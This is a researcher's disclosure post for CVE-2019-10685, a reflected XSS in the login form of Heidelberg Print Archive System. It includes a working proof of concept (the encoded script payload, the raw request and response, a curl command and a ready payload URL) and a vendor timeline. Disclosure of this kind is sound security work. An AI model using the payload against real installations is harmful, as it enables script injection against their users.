A Reflected (XSS) in Print Archive System v2015 release 2.6 CVE-2019–10685
I started to disclosure some pending CVEs , in fact there are few or null vulnerabilities reported for this software (I guess), take note dear Researchers/Pentesters you can play with different XSS attacks , CSRF, LFI/RFI and more… :P , I started to disclosure this first one for now
What is Print Archive System? Heidelberg® offers as archiving tool more info vedor page: https://www.heidelberg.com
CVE-2019–10685
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10685
Vulnerability
The user supplied input containing JavaScript is echoed back in JavaScript code in an HTML response via the “TextField” parameter.
Proof of concept exploit:
Reflected XSS
Payload: %3cscript%3ealert(1)%3c%2fscript%3e
The offending GET request is (no credentials required):
GET /am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2 HTTP/1.1
Host: victim_IP:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01
Reflected XSS Reponse:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 04 Feb 2019 13:15:12 GMT
Connection: close[../snip]id="msgContainer">Authentication failed for: <script>alert(1)</script> <br/>Click Help button for more information about login permissions.</div>
Playing with curl:
# curl -i -s -k -X GET-H "Host: victim:8090"
-H "Accept-Encoding: gzip, deflate"
-H "Accept: */*"
-H "Accept-Language: en-US,en-GB;q=0.9,en;q=0.8"
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
-H "Connection: close"
-H "Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F"
-b "JSESSIONID=C665EA9A7594E736D39C93EA8763A01F"
"http://victim:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2"
--proxy http://127.0.0.1:8080
Simple payload:
http://victim_IP:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert('Alex XSS')%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2
Timeline
================
2019–02–04: Discovered
2019–02–25: Retest PRO environment
2019–03–25: Retest on researcher’s ecosystem
2019–04–02: Vendor notification
2019–04–03: Vendor feedback received
2019–04–08: Reminder sent
2019–04–08: 2nd reminder sent
2019–04–11: Internal communication
2019–04–26: No more feedback received from the vendor
2019–04–30: New issues found
2019–05–06: Public Disclosure
Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.
My current exploit list @exploit-db:
https://www.exploit-db.com/author/?a=1074
https://www.exploit-db.com/author/?a=9576
Mitigations
================
No more feedback received from the vendor
https://www.heidelberg.com